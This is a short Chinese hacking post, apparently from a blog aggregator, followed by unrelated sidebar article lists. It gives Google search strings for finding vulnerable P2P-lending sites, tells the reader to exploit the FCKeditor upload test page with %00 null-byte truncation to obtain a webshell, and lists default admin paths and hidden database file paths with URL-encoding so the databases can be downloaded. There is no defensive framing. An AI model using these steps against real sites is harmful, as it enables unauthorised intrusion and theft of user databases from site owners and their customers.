google链接查找:

inurl:shouyi.asp

inurl:itemlist_xq.asp?id=

很多存在Fckeditor上传链接:

FCKeditor/editor/filemanager/connectors/uploadtest.html

抓包上传%00截断后发送就能获取shell

如果一次发送不行, 就发送多几次即可

如果多次发送同一数据包不行就把%00改成两个%00%00再截断送送一次或多次即可拿shell

通用后台与数据库下载:

后台:   cpcms_admin\cplogin.asp

数据库: cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb

数据库: cp_data\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb

或

后台:   ajcmsadmin\account.asp

数据库: ajcmsadmin\nnyylczccydata\#$ssjjb##17#654543534546$3$3.mdb

或

后台:   ailangeadmin\account.asp

数据库: shujukuDSDFE489#$###789sdf\DS#@FCsad54534234433###\#$ssjjb##17#65454###23233534546$3$3.mdb

注意, 如果要下载数据库, 要把特殊字符转为url编码。

比如:

cp_data\cp_dsds%#^&@!daaa_cc\#$ssjjb##17#65&&^_^%@&@34546$3$3.mdb

转码为:

cp_data\cp_dsds%25%23%5e%26%40%21%64%61%61%61%5f%63%63%5c%23%24%73%73%6a%6a%62%23%23%31%37%23%36%35%26%26%5e%5f%5e%25%40%26%40%33%34%35%34%36%24%33%24%33%2e%6d%64%62

些种p2p界面型形如下:

最新文章

  1. IOS - 本地数据持久化
  2. spring结合Quartz的集群功能实现
  3. 为YAESU FT-817ND 增加频谱功能
  4. 解决SlidingMenu和SwipeBackLayout右滑事件冲突问题
  5. iOS程序进入后台后仍运行定时器NSTimer
  6. 在windows2003系统上安装两个版本的oracle
  7. 使用 .NET 平台,如何玩转 Universal Windows 应用?
  8. Android - 广播机制和Service
  9. js设置元素的onclick传参方法
  10. LINUX的命令(未完待续)
  11. MAC中在eclipse luna上搭建移动平台自己主动化測试框架(UIAutomator/Appium/Robotium/MonkeyRunner)关键点记录
  12. 初识webpack——webpack四个基础概念
  13. 最长单词(一星级题目) 本来是很简单的,其实就是加个flag
  14. C++实现控制台版2048
  15. 对filter的初步认识
  16. spring 数据库多数据源路由
  17. 单片机CPU
  18. R(5): sql 数据处理
  19. sts,eclipse里面配置tomcat
  20. (转)关于三星cortex A9 Sate4412 开发板 uboot 启动的一些问题释疑

热门文章

  1. C运行时库
  2. Matlab中save与load函数的使用
  3. BZOJ 1797 最小割(最小割割边唯一性判定)
  4. 【bzoj3672】[Noi2014]购票 斜率优化dp+CDQ分治+树的点分治
  5. 【bzoj2743】[HEOI2012]采花 树状数组
  6. bzoj3524: [Poi2014]Couriers(主席树)
  7. c++ linux 判断string是中文的 or 英文的 字符串。
  8. Linux之根文件系统介绍与分析20160611
  9. python2.6升级2.7导致yum无法使用 No module named yum
  10. hadoop压缩和解压